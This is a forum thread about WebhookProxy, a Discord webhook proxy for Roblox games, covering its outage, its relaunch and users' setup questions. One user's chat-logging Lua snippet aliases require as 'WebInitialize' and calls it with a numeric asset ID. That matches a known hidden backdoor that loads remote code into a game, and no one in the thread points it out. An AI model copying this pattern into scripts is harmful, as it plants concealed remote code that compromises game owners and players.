WebhookProxy | Discord webhooks go brrrrrrr

Both https://webhook.lewistehminerz.dev/ & https://lewistehminerz.dev/ are down currently. So the information is 100% accurate.

Who issued the dispute? I thought Discord didn’t mind as long as you didn’t abuse the webhook limits.

No clue. This is something we’ll have to see if Lewis will be willing to disclose himself.

The dispute is not by Discord.

Me and my friend of a few years, who I used to host my work with (for free, which was very generous of him), had a falling out recently and unfortunately he has not played nice with anything that I owned. I wasn’t able to transfer the proxy within his deadline (since I had no actual way of doing it at the time) and, well… here we are. I’ve been trying to get everything of mine relating to the proxy to keep the service up but he refuses to let me, so I’m having to set everything up again from scratch which takes time.

I genuinely am sorry. I refrained from disclosing the reason for a while hoping he’d change his mind, but unfortunately not. I recommend switching to Hyra for the time being, and I don’t blame you if you stay with them.

11 Likes

Damn, sorry to hear. Hope it goes well for you in the end.

1 Like

thanks for the heads up, lewi! i got a bit confused when our webhook went radio silent.

let us know when you get your proxy back up and running!

for those interested in switching to hyra, here’s the link to it.

Honestly, for what I did, I just added Hydra as a backup. So if lewi’s proxy ever returns an error, it’ll use Hydra or other proxies.

For real, lewi’s is probably my favorite out of any. But I do recommend to anyone that you should add a backup proxy so you’ll never encounter an error or well, depending on how stable other proxies are.

2 Likes

Hey everyone,

I know it’s been a hot minute but I’m proud to say that it’s back. I’ve spent a lot of time making sure everything’s okay so we should be all good to go now again, and in fully working order!

I apologise for how long its been. I have just been so busy with life and I haven’t had the time or money to deal with this project, but I wanted to provide a working service again and I finally got the time to get everything done right.

Thank you for sticking around.

2 Likes

it can be use now?? bc it won’t work on my game now

show us code so we can fix itt

Mine doesn’t work too
here’s my code:

local WebInitialize = require
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local POSTByte = 5592414500
local webhook = "https://webhook.lewistehminerz.dev/api/webhooks/10112939858950XXXXX/20LisnmzeWwy79wMzPcGEt57Cfbsgzd2QJrHJEGdutjaauCngkXXXXXXXXXXXXXXXXXX" -- (In my game it's wihout the X-es)

Players.PlayerAdded:Connect(function(plr)
    plr.Chatted:Connect(function(msg)
        local data =
    {
        ["contents"] = msg,
        ["username"] = "Game Chat Logs",
        ["avatar_url"] = "",
        ["embeds"] = {{
            ["type"]= "rich",
            ["color"]= tonumber(0xffffff),
            ["fields"]={
                        {

                        ["name"]=plr.Name.." chatted",
                    ["value"]=msg,
                    ["inline"]=true}}}}
    }
        HttpService:PostAsync(webhook, HttpService:JSONEncode(data))
    end)
end)

WebInitialize(POSTByte)

WHP is currently in a ‘recovery’ period of sorts - it seems like loads of the webhooks that were on the service have been deleted, so it’s having to spend a few days working out which ones are missing now based on request responses. I’ll make this more efficient eventually.

image
works a charm thanks xxx

If this is sarcasm, you need to read the responses the API gives you. Don’t just complain about an error because it tells you what you’ve done wrong. Use RequestAsync and read out the body.

1 Like

super glad you got it back up! thanks so much

If you could make a docker-compose, i would assume it’s the same as this filebrowser.
Then I could easily put it up.
filebrowser/filebrowser Tags | Docker Hub

Then I can do it like this image and then use rewrite from internal IP to subdomain :slight_smile:

I need a tutorial video for the correct setup. It’s impossible for beginners to know how to set trustproxy to true and create new stuff and launch it in nginx. Sadly there is no tutorial on Youtube for setting a Roblox-Discord proxy up.

Where in these two code parts do i put the webhook URL?
Does it replace the URL that says:
https://webhook.lewistehminerz.dev/
Or does it replace id, token?

I have tried both, but got this error.

image
image

Unfortunately that’s the best I can do at present in terms of tutorial. I have tried to make it as detailed as possible with the correct configuration files that you can basically just copy and paste, so if you don’t understand then I’m not really sure what to do. What don’t you understand about it?

You need to get the module and import it like any other library. The id and token come from the first and second parts of the URL, respectively, like so:

https://webhook.lewistehminerz.dev/api/webhook/<id>/<token>